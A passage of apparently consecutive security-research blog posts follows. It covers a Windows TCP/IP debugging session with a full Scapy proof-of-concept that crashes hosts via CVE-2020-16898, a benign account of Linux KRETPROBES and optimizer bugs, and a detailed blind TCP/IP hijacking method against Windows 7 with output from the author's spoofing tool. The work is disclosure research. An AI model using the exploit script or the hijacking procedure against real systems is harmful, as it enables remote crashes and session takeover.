fffff804`4820e151 4883c430        add     rsp,30h
fffff804`4820e155 415f            pop     r15
fffff804`4820e157 415e            pop     r14
fffff804`4820e159 5f              pop     rdi
fffff804`4820e15a c3              ret
fffff804`4820e15b 4d85f6          test    r14,r14

In the first ‘cmp‘ instruction, rcx register keeps the value of the requested size. Rax register keeps some huge number, and because of that I could never jump out from that logic. As a result of that call, I had been getting a different address than local stack address and none of the overflow happens. I didn’t know what was going on… So, I started to read the documentation of this function and here is the magic:

“If the requested data in the buffer is contiguous, the return value is a pointer to a location that NDIS provides. If the data is not contiguous, NDIS uses the Storage parameter as follows:
If the Storage parameter is non-NULL, NDIS copies the data to the buffer at Storage. The return value is the pointer passed to the Storage parameter.
If the Storage parameter is NULL, the return value is NULL.”

Here we go… Our big package is kept somewhere in NDIS and pointer to that data is returned instead of copying it to the local buffer on the stack. I started to Google if anyone was already hitting that problem and… of course yes 🙂 Looking at this link:

http://newsoft-tech.blogspot.com/2010/02/

we can learn that the simplest solution is to fragment the package. This is exactly what I’ve done and….

KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x00000139
                       (0x0000000000000002,0xFFFFF80448A662E0,0xFFFFF80448A66238,0x0000000000000000)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff804`45bca210 cc              int     3
0: kd> kpn
 # Child-SP          RetAddr           Call Site
00 fffff804`48a65818 fffff804`45ca9922 nt!DbgBreakPointWithStatus
01 fffff804`48a65820 fffff804`45ca9017 nt!KiBugCheckDebugBreak+0x12
02 fffff804`48a65880 fffff804`45bc24c7 nt!KeBugCheck2+0x947
03 fffff804`48a65f80 fffff804`45bd41e9 nt!KeBugCheckEx+0x107
04 fffff804`48a65fc0 fffff804`45bd4610 nt!KiBugCheckDispatch+0x69
05 fffff804`48a66100 fffff804`45bd29a3 nt!KiFastFailDispatch+0xd0
06 fffff804`48a662e0 fffff804`4844ac25 nt!KiRaiseSecurityCheckFailure+0x323
07 fffff804`48a66478 fffff804`483bb487 tcpip!_report_gsfailure+0x5
08 fffff804`48a66480 aaaaaaaa`aaaaaaaa tcpip!Ipv6pHandleRouterAdvertisement+0x10ef
09 fffff804`48a66830 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0a fffff804`48a66838 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0b fffff804`48a66840 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0c fffff804`48a66848 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0d fffff804`48a66850 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0e fffff804`48a66858 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0f fffff804`48a66860 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
10 fffff804`48a66868 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
11 fffff804`48a66870 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
12 fffff804`48a66878 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
13 fffff804`48a66880 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
14 fffff804`48a66888 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
...

Here we go! 🙂

Proof-of-Concept

Code can be found here:

http://site.pi3.com.pl/exp/p_CVE-2020-16898.py

#!/usr/bin/env python3
#
# Proof-of-Concept / BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
#
# Author: Adam 'pi3' Zabrocki
# http://pi3.com.pl
#

from scapy.all import *

v6_dst = "fd12:db80:b052:0:7ca6:e06e:acc1:481b"
v6_src = "fe80::24f5:a2ff:fe30:8890"

p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
p_test = p_test_half + 'A'.encode()*4

c = ICMPv6NDOptEFA();

e = ICMPv6NDOptRDNSS()
e.len = 21
e.dns = [
"AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

pkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) / \
      Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e

p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
              IPv6ExtHdrFragment()/pkt

l=fragment6(p_test_frag, 200)

for p in l:
    send(p)

Thanks,
Adam

The short story of broken KRETPROBES and OPTIMIZER in Linux Kernel

15 December 2020 at 19:34
By: pi3

The short story of broken KRETPROBES and OPTIMIZER in Linux Kernel.

During the LKRG development process I’ve found that:

  • KRETPROBES are broken since kernel 5.8 (fixed in upcoming kernel)
  • OPTIMIZER was not doing sufficient job since kernel 5.5

First things first – KPROBES and FTRACE:

Linux kernel provides 2 amazing frameworks for hooking – K*ROBES and FTRACE. K*PROBES is older and a classic one – introduced in 2.6.9 (October 2004). However, FTRACE is a newer interface and might have smaller overhead comparing to K*PROBES. I’m using a word “K*PROBES” because various types of K*PROBES were availble in the kernel, including JPROBES, KRETPROBES or classic KPROBES. K*PROBES essentially enables the possibility to dynamically break into any kernel routine. What are the differences between various K*PROBES?

  • KPROBES – can be placed on virtually any instruction in the kernel
  • JPROBES – were implemented using KPROBES. The main idea behind JPROBES was to employ a simple mirroring principle to allow seamless access to the probed function’s arguments. However, since 2017 JPROBEs were depreciated. More information can be found here:
    https://lwn.net/Articles/735667/
  • KRETPROBES – sometimes they are called “return probes” and they also use KPROBES under-the-hood. KRETPROBES allows to easily execute user’s own routine at the entry and return path to the hooked function.However, KRETPROBES can’t be placed on arbitrary instructions.

When a KPROBE is registered, it makes a copy of the probed instruction and replaces the first byte(s) of the probed instruction with a breakpoint instruction (e.g., int3 on i386 and x86_64).

FTRACE are newer comparing to K*PROBES and were initially introduced in kernel 2.6.27, which was released on October 9, 2008. FTRACE works completely differently and the main idea is based on instrumenting every compiled function (injecting a “long-NOP” instruction – GCC’s option “-pg”). When FTRACE is being registered on the specific function, such “long-NOP” is being replaced with JUMP instruction which points to the trampoline code. Later such trampoline can execute any pre-registered user-defined hook.

A few words about Linux Kernel Runtime Guard (LKRG)

In short, LKRG performs runtime integrity checking of the Linux kernel (similar to PatchGuard technology from Microsoft) and detection of the various exploits against the kernel. LKRG attempts to post-detect and promptly respond to unauthorized modifications to the running Linux kernel (system integrity) or to corruption of the task integrity such as credentials (user/group IDs), SECCOMP/sandbox rules, namespaces, and more.
To be able to implement such functionality, LKRG must place various hooks in the kernel. KRETPROBES are used to fulfill that requirement.

LKRG’s KPROBE on FTRACE instrumented functions

A careful reader might ask an interesting question: what will happen if the function is instrumented by the FTRACE (injected “long-NOP”) and someone registers K*PROBES on it? Does dynamically registered FTRACE “overwrite” K*PROBES installed on that function and vice versa?

Well, this is a very common situation from LKRG’s perspective, since it is placing KRETPROBES on many syscalls. Linux kernel uses a special type of K*PROBES in such case and it is called “FTRACE-based KPROBES”. Essentially, such special KPROBE is using FTRACE infrastructure and has very little to do with KPROBES itself. That’s interesting because it is also subject to FTRACE rules e.g. if you disable FTRACE infrastructure, such special KPROBE won’t work either.

OPTIMIZER

Linux kernel developers went one step forward and they aggressively “optimize” all K*PROBES to use FTRACE instead. The main reason behind that is performance – FTRACE has smaller overhead. If for any reason such KPROBE can’t be optimized, then classic old-school KPROBES infrastructure is used.

When you analyze all KRETPROBES placed by LKRG, you will realize that on modern kernels all of them are being converted to some type of FTRACE 🙂

LKRG reports False Positives

After such a long introduction finally, we can move on to the topic of this article. Vitaly Chikunov from ALT Linux reported that when he runs FTRACE stress tester, LKRG reports corruption of .text section:

https://github.com/openwall/lkrg/issues/12

I spent a few weeks (month+) on making LKRG detect and accept authorized third-party modifications to the kernel’s code placed via FTRACE. When I finally finished that work, I realized that additionally, I need to protect the global FTRACE knob (sysctl kernel.ftrace_enabled), which allows root to completely disable FTRACE on a running system. Otherwise, LKRG’s hooks might be unknowingly disabled, which not only disables its protections (kind of OK under a threat model where we trust host root), but may also lead to false positives (as without the hooks LKRG wouldn’t know which modifications are legitimate). I’ve added that functionality, and everything was working fine…
… until kernel 5.9. This completely surprised me. I’ve not seen any significant changes between 5.8.x and 5.9.x in FTRACE logic. I spent some time on that and finally I realized that my protection of global FTRACE knob stopped working on latest kernels (since 5.9). However, this code was not changed between kernel 5.8.x and 5.9.x. What’s the mystery?

First problem – KRETPROBES are broken.

Starting from kernel 5.8 all non-optimized KRETPROBES don’t work. Until 5.8, when #DB exception was raised, entry to the NMI was not fully performed. Among others, the following logic was executed:
https://elixir.bootlin.com/linux/v5.7.19/source/arch/x86/kernel/traps.c#L589

if (!user_mode(regs)) {
    rcu_nmi_enter();
    preempt_disable();
}

In some older kernels function ist_enter() was called instead. Inside this function we can see the following logic:
https://elixir.bootlin.com/linux/v5.7.19/source/arch/x86/kernel/traps.c#L91

if (user_mode(regs)) {
    RCU_LOCKDEP_WARN(!rcu_is_watching(), "entry code didn't wake RCU");
} else {
    /*
     * We might have interrupted pretty much anything.  In
     * fact, if we're a machine check, we can even interrupt
     * NMI processing.  We don't want in_nmi() to return true,
     * but we need to notify RCU.
     */
    rcu_nmi_enter();
}

preempt_disable();

As the comment says “We don’t want in_nmi() to return true, but we need to notify RCU.“. However, since kernel 5.8 the logic of how interrupts are handled was modified and currently we have this (function “exc_int3“):
https://elixir.bootlin.com/linux/v5.8/source/arch/x86/kernel/traps.c#L630

/*
 * idtentry_enter_user() uses static_branch_{,un}likely() and therefore
 * can trigger INT3, hence poke_int3_handler() must be done
 * before. If the entry came from kernel mode, then use nmi_enter()
 * because the INT3 could have been hit in any context including
 * NMI.
 */
if (user_mode(regs)) {
    idtentry_enter_user(regs);
    instrumentation_begin();
    do_int3_user(regs);
    instrumentation_end();
    idtentry_exit_user(regs);
} else {
    nmi_enter();
    instrumentation_begin();
    trace_hardirqs_off_finish();
    if (!do_int3(regs))
        die("int3", regs, 0);
    if (regs->flags & X86_EFLAGS_IF)
        trace_hardirqs_on_prepare();
    instrumentation_end();
    nmi_exit();
}

The root of unlucky change comes from this commit:

https://github.com/torvalds/linux/commit/0d00449c7a28a1514595630735df383dec606812#diff-51ce909c2f65ed9cc668bc36cc3c18528541d8a10e84287874cd37a5918abae5

which was later modified by this commit:

https://github.com/torvalds/linux/commit/8edd7e37aed8b9df938a63f0b0259c70569ce3d2

and this is what we currently have in all kernels since 5.8. Essentially, KRETPROBES are not working since these commits. We have the following logic:

asm_exc_int3() -> exc_int3():
                    |
    ----------------|
    |
    v
...
nmi_enter();
...
if (!do_int3(regs))
       |
  -----|
  |
  v
do_int3() -> kprobe_int3_handler():
                    |
    ----------------|
    |
    v
...
if (!p->pre_handler || !p->pre_handler(p, regs))
                             |
    -------------------------|
    |
    v
...
pre_handler_kretprobe():
...
    if (unlikely(in_nmi())) {
        rp->nmissed++;
        return 0;
    }

Essentially, exc_int3() calls nmi_enter(), and pre_handler_kretprobe() before invoking any registered KPROBE verifies if it is not in NMI via in_nmi() call.

I’ve reported this issue to the maintainers and it was addressed and correctly fixed. These patches are going to be backported to the stable tree (and hopefully to LTS kernels as well):

https://lists.openwall.net/linux-kernel/2020/12/09/1313

However, coming back to the original problem with LKRG… I didn’t see any issues with kernel 5.8.x but with 5.9.x. It’s interesting because KRETPROBES were broken in 5.8.x as well. So what’s going on?

As I mentioned at the beginning of the article, K*PROBES are aggressively optimized and converted to FTRACE. In kernel 5.8.x LKRG’s hook was correctly optimized and didn’t use KRETPROBES at all. That’s why I didn’t see any problems with this version. However, for some reasons, such optimization was not possible in kernel 5.9.x. This results in placing classic non-optimized KRETPROBES which we know is broken.

Second problem – OPTIMIZER isn’t doing sufficient job anymore.

I didn’t see any changes in the sources regarding the OPTIMIZER, neither in the hooked function itself. However, when I looked at the generated vmlinux binary, I saw that GCC generated a padding at the end of the hooked function using INT3 opcode:

...
ffffffff8130528b:       41 bd f0 ff ff ff       mov    $0xfffffff0,%r13d
ffffffff81305291:       e9 fe fe ff ff          jmpq   ffffffff81305194
ffffffff81305296:       cc                      int3
ffffffff81305297:       cc                      int3
ffffffff81305298:       cc                      int3
ffffffff81305299:       cc                      int3
ffffffff8130529a:       cc                      int3
ffffffff8130529b:       cc                      int3
ffffffff8130529c:       cc                      int3
ffffffff8130529d:       cc                      int3
ffffffff8130529e:       cc                      int3
ffffffff8130529f:       cc                      int3

Such padding didn’t exist in this function in generated images for older kernels. Nevertheless, such padding is pretty common.

OPTIMIZER logic fails here:

try_to_optimize_kprobe() -> alloc_aggr_kprobe() -> __prepare_optimized_kprobe()
-> arch_prepare_optimized_kprobe() -> can_optimize():
/* Decode instructions */
addr = paddr - offset;
while (addr < paddr - offset + size) { /* Decode until function end */
    unsigned long recovered_insn;
    if (search_exception_tables(addr))
        /*
         * Since some fixup code will jumps into this function,
         * we can't optimize kprobe in this function.
         */
        return 0;
    recovered_insn = recover_probed_instruction(buf, addr);
    if (!recovered_insn)
        return 0;
    kernel_insn_init(&insn, (void *)recovered_insn, MAX_INSN_SIZE);
    insn_get_length(&insn);
    /* Another subsystem puts a breakpoint */
    if (insn.opcode.bytes[0] == INT3_INSN_OPCODE)
        return 0;
    /* Recover address */
    insn.kaddr = (void *)addr;
    insn.next_byte = (void *)(addr + insn.length);
    /* Check any instructions don't jump into target */
    if (insn_is_indirect_jump(&insn) ||
        insn_jump_into_range(&insn, paddr + INT3_INSN_SIZE,
                 DISP32_SIZE))
        return 0;
    addr += insn.length;
}

One of the checks tries to protect from the situation when another subsystem puts a breakpoint there as well:

    /* Another subsystem puts a breakpoint */
    if (insn.opcode.bytes[0] == INT3_INSN_OPCODE)
        return 0;

However, that’s not the case here. INT3_INSN_OPCODE is placed at the end of the function as padding.
I wanted to find out why INT3 padding is more common in the new kernels while it’s not the case for older ones even though I’m using exactly the same compiler and linker. I’ve started browsing commits and I’ve found this one:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7705dc8557973d8ad8f10840f61d8ec805695e9e

diff --git a/arch/x86/kernel/vmlinux.lds.S b/arch/x86/kernel/vmlinux.lds.S
index b06d6e1188deb..3a1a819da1376 100644
--- a/arch/x86/kernel/vmlinux.lds.S
+++ b/arch/x86/kernel/vmlinux.lds.S
@@ -144,7 +144,7 @@ SECTIONS
 		*(.text.__x86.indirect_thunk)
 		__indirect_thunk_end = .;
 #endif
-	} :text = 0x9090
+	} :text =0xcccc
 
 	/* End of text section, which should occupy whole number of pages */
 	_etext = .;

It looks like INT3 is now a default padding used by the linker.

I’ve brought up that problem with the Linux kernel developers (KPROBES owners), and Masami Hiramatsu prepared appropriate patch which fixes the problem:

https://lists.openwall.net/linux-kernel/2020/12/11/265

I’ve verified it and now it works well. Thanks to LKRG development work we helped identify and fix two interesting problems in Linux kernel 🙂

Thanks,
Adam

Windows 7 TCP/IP hijacking

24 January 2021 at 18:18
By: pi3

Blind TCP/IP hijacking is still alive on Windows 7… and not only. This version of Windows is certainly one of the “juiciest” targets even though January 14th 2020 was the official EOL (End Of Life) for it. Based on various data Windows 7 holds around 25% share of the Operating Systems (OS) market and is still the world’s second most popular desktop operating system.

A little bit of history

It was a few months before I joined Microsoft as a Security Software Engineer in 2012 when I sent them a report with an interesting bug/vulnerability in all versions of Microsoft Windows including Windows 7 (the latest version at that time). It was an issue in the implementation of TCP/IP stack allowing attackers to carry out a blind TCP/IP hijacking attack. During my discussion with MSRC (Microsoft Security Response Center) they acknowledged the bug exists, but they had their doubts about the impact of the issue claiming “it is very difficult and very unreliable” to exploit. Therefore, they were not going to address it in the current OSes. However, they would fix it in the upcoming OS which was going to be released soon (Windows 8).

I didn’t agree with MSRC’s evaluation. In 2008 I developed a fully working PoC which would automatically find all the necessary primitives (client’s port, SQN and ACK) to perform blind TCP/IP hijacking attack. This tool was exploiting exactly the same weaknesses in TCP/IP stack which I’ve reported. That being said, Microsoft informed me that if I share my tool (I didn’t want to do it), they would reconsider their decision. However, for now, no CVE would be allocated, and this problem was supposed to be addresses in Windows 8.

In the next months I started my work as FTE (Full Time Employee) for Microsoft, and I verified that this problem was fixed in Windows 8.  Over the course of years, I completely forgot about it. Nevertheless, when I left Microsoft, I was doing some cleanups on my old laptop and found my old tool. I copied it from the laptop and decided to re-visit it once I will have a bit more time. I found some time and thought that my tool deserves a release and a proper description.

What is TCP/IP hijacking?

Most likely majority of the readers are aware what this is. For those who don’t, I encourage you to read many great articles about it which you can find on the internet these days.

It might be worth to mention that probably the most famous blind TCP/IP hijacking attack was done by Kevin Mitnick against the computers of Tsutomu Shimomura at the San Diego Supercomputer Center on Christmas Day, 1994.

This is a VERY old-school technique which nobody expects to be alive in 2021… Yet, it’s still possible to perform TCP/IP session hijacking today without attacking the PRNG responsible for generating the initials TCP sequence numbers (ISN).

What is the impact of TCP/IP hijacking nowadays?

(Un)fortunately it is not as catastrophic as it used to be. The main reason is that majority of the modern protocols do implement encryption. Sure, it’s overwhelmingly bad if attacker can hijack any TCP/IP session which is established. However, if the upper-layer protocols properly implement encryption, attackers are limited in terms of what they can do with it. Unless they have ability to correctly generate encrypted messages.

That being said, we still have widely deployed protocols which do not encrypt the traffic, e.g., FTP, SMTP, HTTP, DNS, IMAP, and more. Thankfully, protocols like Telnet or Rlogin (hopefully?) can be seen only in the museum.

Where is the bug?

TL;DR: In the implementation of TCP/IP stack for Windows 7, IP_ID is a global counter.

Details:

The tool which I developed in 2008 was implementing a known attack described by ‘lkm’ (there is a typo and real nickname of the author is ‘klm’) in Phrack 64 magazine and can be read here:

http://phrack.org/issues/64/13.html

This is an amazing article (research) and I encourage everyone to carefully study all the details.

Back in 2007 (and 2008) this attack could be executed successfully on many modern OS (modern at that time) including Windows 2K/XP or FreeBSD 4. I gave a live presentation of this attack against Windows XP on a local conference in Poland (SysDay 2009).

Before we move to the details on how to perform described attack, it is useful to refresh how TCP handles the communication in more details. Quoting phrack paper:

Each of the two hosts involved in the connection computes a 32bits SEQ number randomly at the establishment of the connection. This initial SEQ number is called the ISN. Then, each time an host sends some packet with N bytes of data, it adds N to the SEQ number.

The sender put his current SEQ in the SEQ field of each outgoing TCP packet. The ACK field is filled with the next expected SEQ number from the other host. Each host will maintain his own next sequence number (called SND.NEXT), and next expected SEQ number from the other host (called RCV.NEXT.
(…)
TCP implements a flow control mechanism by defining the concept of “window”. Each host has a TCP window size (which is dynamic, specific to each TCP connection, and announced in TCP packets), that we will call RCV.WND.
At any given time, a host will accept bytes with sequence number between RCV.NXT and (RCV.NXT+RCV.WND-1). This mechanism ensures that at any time, there can be no more than RCV.WND bytes “in transit” to the host.

In short, in order to execute TCP/IP hijacking attack, we must know:

  • Client IP
  • Server IP (usually known)
  • Client port
  • Server port (usually known)
  • Sequence number of the client
  • Sequence number of the server

OK, but what it has to do with IP ID?

In 1998(!), Salvatore Sanfilippo (aka antirez) posted in the Bugtraq mailing list a description of a new port scanning technique which is known today as an “Idle scan”. Original post can be found here:

https://seclists.org/bugtraq/1998/Dec/79

and more information about Idle scan you can read here:

https://nmap.org/book/idlescan.html

In short, if IP_ID is implemented as a global counter (which is the case e.g., in Windows 7), it is simply incremented with each sent IP packet. By “probing” the IP_ID of the victim we know how many packets have been sent between each “probe”. Such “probing” can be performed by sending any packet to the victim which results in a reply to the attacker. ‘lkm’ suggests using an ICMP packet, but it can be any packet with IP header:

[===================================================================]
attacker                                  Host
                --[PING]->
        <-[PING REPLY, IP_ID=1000]--

          ... wait a little ... 

                --[PING]->
        <-[PING REPLY, IP_ID=1010]-- 

<attacker> Uh oh, the Host sent 9 IP packets between my pings.
[===================================================================]

This essentially creates some form of “covert channel” which can be exploited by remote attacker to “discover” all the necessary information to execute TCP/IP Hijacking attack. How? Let’s quote the original phrack article:

Discovering client’s port

Assuming we already know the client/server IP, and the server port, there’s a well known method to test if a given port is the correct client port. In order to do this, we can send a TCP packet with the SYN flag set to server-IP:server-port, from client-IP:guessed-client-port (we need to be able to send spoofed IP packets for this technique to work).

When attacker guessed the valid client’s port, server replies to the real client (not attacker) with ACK. If port was incorrect, server replies to the real client with SYN+ACK. A real client didn’t start a new connection so it replies to the server with RST.

So, all we have to do to test if a guessed client-port is the correct one
is:

– Send a PING to the client, note the IP ID
– Send our spoofed SYN packet
– Resend a PING to the client, note the new IP ID
– Compare the two IP IDs to determine if the guessed port was correct.

Finding the server’s SND.NEXT

This is the essential part, and the best what I can do is to quote (again) phrack article:

Whenever a host receive a TCP packet with the good source/destination ports, but an incorrect seq and/or ack, it sends back a simple ACK with the correct SEQ/ACK numbers. Before we investigate this matter, let’s define exactly what is a correct seq/ack combination, as defined by the RFC793 [2]:

A correct SEQ is a SEQ which is between the RCV.NEXT and (RCV.NEXT+RCV.WND-1) of the host receiving the packet. Typically, the RCV.WND is a fairly large number (several dozens of kilobytes at last).

A correct ACK is an ACK which corresponds to a sequence number of something the host receiving the ACK has already sent. That is, the ACK field of the packet received by an host must be lower or equal than the host’s own current SND.SEQ, otherwise the ACK is invalid (you can’t acknowledge data that were never sent!).

It is important to node that the sequence number space is “circular”. For exemple, the condition used by the receiving host to check the ACK validity is not simply the unsigned comparison “ACK <= receiver’s SND.NEXT”, but the signed comparison “(ACK – receiver’s SND.NEXT) <= 0”.

Now, let’s return to our original problem: we want to guess server’s SND.NEXT. We know that if we send a wrong SEQ or ACK to the client from the server, the client will send back an ACK, while if we guess right, the client will send nothing. As for the client-port detection, this may be tested with the IP ID.

If we look at the ACK checking formula, we note that if we pick randomly two ACK values, let’s call them ack1 and ack2, such as |ack1-ack2| = 2^31, then exactly one of them will be valid. For example, let ack1=0 and ack2=2^31. If the real ACK is between 1 and 2^31 then the ack2 will be an acceptable ack. If the real ACK is 0, or is between (2^32 – 1) and (2^31 + 1), then, the ack1 will be acceptable.

Taking this into consideration, we can more easily scan the sequence number space to find the server’s SND.NEXT. Each guess will involve the sending of two packets, each with its SEQ field set to the guessed server’s SND.NEXT. The first packet (resp. second packet) will have his ACK field set to ack1 (resp. ack2), so that we are sure that if the guessed’s SND.NEXT is correct, at least one of the two packet will be accepted.

The sequence number space is way bigger than the client-port space, but two facts make this scan easier:

First, when the client receive our packet, it replies immediately. There’s not a problem with latency between client and server like in the client-port scan. Thus, the time between the two IP ID probes can be very small, speeding up our scanning and reducing greatly the odds that the client will have IP traffic between our probes and mess with our detection.

Secondly, it’s not necessary to test all the possible sequence numbers, because of the receiver’s window. In fact, we need only to do approx. (2^32 / client’s RCV.WND) guesses at worst (this fact has already been mentionned in [6]). Of course, we don’t know the client’s RCV.WND.
We can take a wild guess of RCV.WND=64K, perform the scan (trying each SEQ multiple of 64K). Then, if we didn’t find anything, wen can try all SEQs such as seq = 32K + i64K for all i. Then, all SEQ such as seq=16k + i32k, and so on… narrowing the window, while avoiding to re-test already tried SEQs. On a typical “modern” connection, this scan usually takes less than 15 minutes with our tool.

With the server’s SND.NEXT known, and a method to work around our ignorance of the ACK, we may hijack the connection in the way “server -> client”. This is not bad, but not terribly useful, we’d prefer to be able to send data from the client to the server, to make the client execute a command, etc… In order to do this, we need to find the client’s SND.NEXT.

And here is a small, weird difference in Windows 7. Described scenario perfectly works for Windows XP but I’ve encountered a different behavior in Windows 7. Having two edge cases as ACK value to fulfill ACK formula doesn’t really change anything and I have exactly the same results (just in Windows 7) just by always using one of the edge values for ACK. Originally, I thought that my implementation of attack is not working against Windows 7. However, after some tests and tuning it turns out that’s not the case. I’m not sure why or what I’m missing but, in the end, you can send less packages (twice less) and speed-up the overall attack.

Finding the client’s SND.NEXT

Quote:

What we can do to find the client’s SND.NEXT ? Obviously we can’t use the same method as for the server’s SND.NEXT, because the server’s OS is probably not vunerable to this attack, and besides, the heavy network traffic on the server would render the IP ID analysis infeasible.

However, we know the server’s SND.NEXT. We also know that the client’s SND.NEXT is used for checking the ACK fields of client’s incoming packets.
So we can send packets from the server to the client with SEQ field set to server’s SND.NEXT, pick an ACK, and determine (again with IP ID) if our ACK was acceptable.

If we detect that our ACK was acceptable, that means that (guessed_ACK – SND.NEXT) <= 0. Otherwise, it means.. well, you guessed it, that (guessed_ACK – SND_NEXT) > 0.

Using this knowledge, we can find the exact SND_NEXT in at most 32 tries by doing a binary search (a slightly modified one, because the sequence space is circular).

Now, at last we have all the required informations and we can perform the session hijacking from either client or server.

(Un)fortunately, here Windows 7 is different as well. This is connected to the differences in the previous stage of how it handles correctness of ACK. Regardless of the guessed_ACK value ((guessed_ACK - SND.NEXT) <= 0 or (guessed_ACK - SND_NEXT) > 0) Windows 7 won’t send any package back to the server. Essentially, we are blind here and we can’t do the same amazingly effective ‘binary search’ to find the correct ACK. However, we are not completely lost here. We can always brute force ACK if we have the correct SQN. Again, we don’t need to verify every possible value of ACK, we can still use the same trick with TCP window size. Nevertheless, to be more effective and not miss the correct ACK brackets, I’ve chosen to use window size value as 0x3FF. Essentially, we are flooding the server with the spoofed packets containing our payload for injection, with the correct SQN and guessed ACK. This operation takes around 5 minutes and is effective 🙂 Nevertheless, if for any reason our payload is not injected, a smaller TCP window size (e.g., 0xFF) should be chosen.

Important notes

  1. This type of attack is not limited to any specific OS, but rather leverages “covert channel” generated by implementing IP_ID as a global counter. In short, any OS which is vulnerable to the “Idle scan” is also vulnerable to the old-school blind TCP/IP Hijacking attack.
  2. We need to be able to send spoofed IP packets to execute this attack.
    • Our attack relies on “scanning” and constant “poking” of IP_ID:
    • Any latency between victim and the server affects such logic.
    • If victim’s machine is overloaded (heavy or slow traffic) it obviously affects the attack. Taking appropriate measures of the victim’s networking performance might be necessary for correct tuning of the attack.

Proof-of-Concept

Originally, I implemented lkm’s attack in 2008 and I tested it against Windows XP. When I ran compiled binary on the modern system, everything was working fine. However, when I took the original sources and wanted to recompile it on the modern Linux environment, my tool stopped working(!). New binary was not able to find client’s port neither SQN. However, old binary still worked perfectly fine. It was a riddle for me what was really happening. Output of strace tool gave me some clues:

Generated packet from the old binary:

sendmsg(4, {msg_name={sa_family=AF_INET, sin_port=htons(21), sin_addr=inet_addr("192.168.1.169")}, msg_namelen=16, msg_iov=[{iov_base="E\0\0(\0\0\0\[email protected]\6\0\0\300\250\1\356\300\250\1\251\277\314\0\25\0\0\0224\0\0VxP\2\26\320\353\234\0\0", iov_len=40}], msg_iovlen=1, msg_control=[{cmsg_len=24, cmsg_level=SOL_IP, cmsg_type=IP_PKTINFO, cmsg_data={ipi_ifindex=0, ipi_spec_dst=inet_addr("0.0.0.0"), ipi_addr=inet_addr("0.0.0.0")}}], msg_controllen=24, msg_flags=0}, 0) = 40

Generated packet from the new binary:

sendmsg(4, {msg_name={sa_family=AF_INET, sin_port=htons(21), sin_addr=inet_addr("192.168.1.169")}, msg_namelen=16, msg_iov=[{iov_base="E\0\0(\0\0\0\[email protected]\6\0\0\300\250\1\356\300\250\1\251\277\314\0\25\0\0\0224\0\0VxP\2\26\320\2563\0\0", iov_len=40}], msg_iovlen=1, msg_control=[{cmsg_len=28, cmsg_level=SOL_IP, cmsg_type=IP_PKTINFO, cmsg_data={ipi_ifindex=0, ipi_spec_dst=inet_addr("0.0.0.0"), ipi_addr=inet_addr("0.0.0.0")}}], msg_controllen=32, msg_flags=0}, 0) = 40

cmsg_len and msg_controllen has different values. However, I didn’t modify the source code so how is it possible? Some GCC/Glibc changes broke the functionality of sending the spoofed package. I’ve found the answer here:

https://sourceware.org/pipermail/libc-alpha/2016-May/071274.html

I needed to rewrite spoofing function to make it functional again on the modern Linux environment. However, to do that I needed to use different API. I wonder how many non-offensive tools were broken by this change 🙂

Windows 7

I’ve tested this tool against fully updated Windows 7. Surprisingly, rewriting PoC was not the most difficult task… setting up a fully updated Windows 7 is much more problematic. Many updates break update channel/service(!) itself and you need to manually fix it. Usually, it means manual downloading of the specific KB and installing it in “safe mode”. Then it can “unlock” update service and you can continue your work. In the end it took me around 2-3 days to get fully updated Windows 7 and it looks like this:

192.168.1.132 – attacker’s IP address
192.168.1.238 – victim’s Windows 7 machine IP address
192.168.1.169 – FTP server running on Linux. I’ve tested ProFTPd and vsFTP servers running under git TOT kernel (5.11+)

This tool does not do appropriate “tuning” per victim which could significantly speed-up the attack. However, in my specific case, the full attack which means finding client’s port address, finding server’s SQN and finding client’s SQN took about 45 minutes.

I found old logs from attacking Windows XP (~2009) and the entire attack took almost an hour:

pi3-darkstar z_new # time ./test -r 192.168.254.20 -s 192.168.254.46 -l 192.168.254.31 -p 21 -P 5357 -c 49450 -C “PWD”

                …::: -=[ [d]evil_pi3 TCP/IP Blind Spoofer by Adam ‘pi3’ Zabrocki ]=- :::…

        [+] Trying to find client port
        [+] Found port => 49456!
        [+] Veryfing… OK! 🙂

        [+] Second level of verifcation
        [+] Found port => 49456!
        [+] Veryfing… OK! 🙂

        [!!] Port is found (49456)! Let’s go further…

        [+] Trying to find server’s window SQN
